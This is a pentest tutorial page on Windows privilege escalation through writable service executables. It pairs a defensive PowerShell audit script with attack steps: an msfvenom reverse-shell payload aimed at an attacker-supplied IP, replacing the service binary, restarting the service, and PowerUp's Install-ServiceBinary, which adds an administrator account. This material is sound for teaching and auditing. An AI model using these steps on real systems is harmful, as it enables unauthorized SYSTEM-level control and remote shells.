Attacks - Windows Privilege Escalation

Service Exploits - Writable Service Executable

In Windows, services often run with elevated privileges (e.g., SYSTEM). If the executable for a service is writable by a low-privileged user, it can be replaced with a malicious binary, allowing privilege escalation.

How It Works

  1. Service Executables: Each Windows service has a binary executable file that is executed when the service starts.
  2. Writable Executable: If the permissions on the service executable allow a non-administrative user to overwrite it, they can replace it with a malicious executable.
  3. Privilege Escalation: When the service is restarted, the malicious executable runs with the service’s privileges (e.g., SYSTEM).

Steps to Exploit

1. Identify Writable Service Executables

First, check the permissions of the service executable to see if it’s writable by a low-privileged user. This can be done using tools like accesschk.exe:

accesschk.exe /accepteula -wu "C:\Path\To\Service.exe"

RW in the output indicates that the current user has both read and write access to the file.
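The accesschk check above tests a single path for the current user. As an added example from the defender's side (it is not part of the original page, nor code from Sysinternals or PowerUp), the PowerShell below audits every installed service: it extracts each service's binary path from its ImagePath, then checks both the file and the directory that contains it for Allow ACEs that grant write rights to well-known low-privileged groups, and can strip an offending non-inherited ACE. The principal list in $WeakPrincipals and the bit mask in $WriteMask are assumptions to adapt to your environment; run it from an elevated session so every service's ACL can be read.

```powershell
# Added example (not from the original page): audit each service's binary and its parent
# directory for write access held by low-privileged principals, and remove a weak ACE.
# Assumes an elevated PowerShell session on the host being audited.

# Principals that should never hold write rights on a service binary. This list is an
# assumption; extend it for your environment (e.g. domain groups).
$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace or alter the file, or add/replace files in the directory.
# Write, Modify and FullControl all contain WriteData, so they match through that bit. Some ACEs
# carry generic rights instead of named ones, so GENERIC_WRITE (0x40000000) and
# GENERIC_ALL (0x10000000) are included as raw bits.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [int][System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [int][System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             [int][System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             0x40000000 -bor 0x10000000

# Extract the executable path from a service's PathName, which may be quoted and may carry
# arguments. An unquoted path with spaces is grown one token at a time until it names a file.
function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $null
    }
    $tokens = $p -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $null
}

# True when an Allow ACE grants one of the weak principals any right in $WriteMask.
function Test-WeakWriteAce {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    if ($Ace.AccessControlType -ne 'Allow') { return $false }
    if ($WeakPrincipals -notcontains $Ace.IdentityReference.Value) { return $false }
    return (([int]$Ace.FileSystemRights -band $WriteMask) -ne 0)
}

# Report every (service, path, principal) finding where a weak principal can write to the
# service binary or to its parent directory. RunsAs shows the account the service uses,
# which is what an attacker would inherit (LocalSystem being the worst case).
function Get-WritableServiceBinary {
    $findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath -PathName ([string]$svc.PathName)
        if (-not $bin) { continue }
        foreach ($target in @($bin, (Split-Path -Path $bin -Parent))) {
            try { $acl = Get-Acl -LiteralPath $target -ErrorAction Stop } catch { continue }
            foreach ($ace in $acl.Access) {
                if (Test-WeakWriteAce -Ace $ace) {
                    [pscustomobject]@{
                        Service   = $svc.Name
                        RunsAs    = $svc.StartName
                        Path      = $target
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
    }
    return @($findings)
}

# Remove weak, non-inherited ACEs for $Principal from $Path and return how many were removed.
# Inherited ACEs cannot be removed here; fix the directory they come from instead.
function Remove-WeakWriteAce {
    param([string]$Path, [string]$Principal)
    $acl = Get-Acl -LiteralPath $Path
    $removed = 0
    foreach ($ace in @($acl.Access)) {
        if ($ace.IdentityReference.Value -ne $Principal) { continue }
        if (-not (Test-WeakWriteAce -Ace $ace)) { continue }
        if ($ace.IsInherited) {
            Write-Warning "ACE for $Principal on $Path is inherited; fix the parent directory instead."
            continue
        }
        if ($acl.RemoveAccessRule($ace)) { $removed++ }
    }
    if ($removed -gt 0) { Set-Acl -LiteralPath $Path -AclObject $acl }
    return $removed
}

# Usage: list findings, then remediate a specific one (hypothetical path and principal).
Get-WritableServiceBinary | Format-Table -AutoSize
# Remove-WeakWriteAce -Path 'C:\Path\To\Service.exe' -Principal 'BUILTIN\Users'
```

The parent-directory check matters because the `move` in step 2 succeeds when the directory is writable even if the binary itself is not; accesschk on the file alone misses that case. Findings marked Inherited usually come from an over-permissive install folder, so the fix belongs on the folder rather than the file.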

2. Replace the Executable with a Malicious File

Use tools like msfvenom to generate a malicious payload, such as a reverse shell, and save it as an .exe file:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f exe -o MaliciousService.exe

Then, overwrite the original service executable with the malicious one:

move MaliciousService.exe "C:\Path\To\Service.exe"

3. Restart the Service

Restart the service to execute the malicious executable with the service’s elevated privileges:

net stop <service-name>
net start <service-name>

Alternatively, use PowerUp to automate both the check and the exploit.

Using PowerUp

Import-Module .\PowerUp.ps1
Invoke-AllChecks

This runs all of PowerUp's enumeration checks. If the output contains a line like this:

Modifiable Service Files 		Install-ServiceBinary -Name <service-name>

the service is likely vulnerable.

Alternatively, run Get-ModifiableServiceFile to check only for modifiable service files instead of running every check.

Get-ModifiableServiceFile

This enumerates all services where the current user can write to the associated service binary or its arguments.

To exploit it automatically:

Install-ServiceBinary -Name <service-name>

If the output looks like this:

VulnService C:\Temp\service.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add C:\Temp\service.exe

then voilà 🎉, it created an administrative user for you (don't forget to restart the service to make it happen).